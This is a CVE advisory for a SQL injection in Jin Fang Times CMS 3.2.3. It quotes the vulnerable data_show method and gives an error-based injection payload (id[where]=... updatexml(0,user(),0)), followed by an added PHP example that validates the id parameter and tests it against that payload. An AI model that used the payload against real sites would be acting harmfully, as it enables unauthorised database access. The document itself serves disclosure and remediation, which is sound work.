CVE-2024-34310

[Suggested description] Jin Fang Times Content Management System v3.2.3 was discovered to contain a SQL injection vulnerability via the id parameter.


[Vulnerability Type] SQL Injection


[Vendor of Product] https://www.bjjfsd.com/


[Affected Product Code Base] Jin Fang times content management system - 3.2.3


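[Affected Component] public function data_show($id = 0) {
    if (empty($id)) {
        $this->redirect('index');
    }
    // $id comes from the request unchecked; an array value such as
    // id[where]=... is handed to find() as-is
    $info = M('News')->find($id);
    // ... remainder of the method is not included in the report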


[Attack Type] Remote


[Impact Code execution] true


[Impact Information Disclosure] true


[Attack Vectors] m=Wap&c=Index&a=data_show&id[where]=1%20or%20updatexml(0,user(),0)


[Discoverer] yishan


[Reference] http://jin.com https://www.bjjfsd.com/

Use CVE-2024-34310.
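
One way to close this input path is to accept only a plain positive integer for id before the model call. The PHP below is an added example, not code from the CMS or the reporter; normalize_id is a hypothetical helper name, and the sample query strings are constructed except the last, which is the attack vector quoted in this report.

```php
<?php
// Added example, not code from the affected CMS.
// normalize_id() is a hypothetical helper name.

/**
 * Return a positive integer id, or null when the request value is not a
 * plain decimal integer. PHP turns a parameter written as id[where]=...
 * into an array, so the scalar check has to come before any query call.
 */
function normalize_id($raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null; // arrays, null, objects
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Constructed query strings; the last one is the vector from the report.
$samples = [
    'm=Wap&c=Index&a=data_show&id=42',
    'm=Wap&c=Index&a=data_show&id=42%20or%201=1',
    'm=Wap&c=Index&a=data_show&id[where]=1%20or%20updatexml(0,user(),0)',
];

foreach ($samples as $qs) {
    parse_str($qs, $params); // same bracket-to-array parsing PHP applies to $_GET
    $raw = $params['id'] ?? null;
    $id  = normalize_id($raw);
    printf("%-8s -> %s\n", gettype($raw), $id === null ? 'rejected' : "accepted as $id");
}

// In data_show() the check would run before the model call, for example:
//   $id = normalize_id($id);
//   if ($id === null) { $this->redirect('index'); }
//   $info = M('News')->find($id);   // find() now only ever receives an int
```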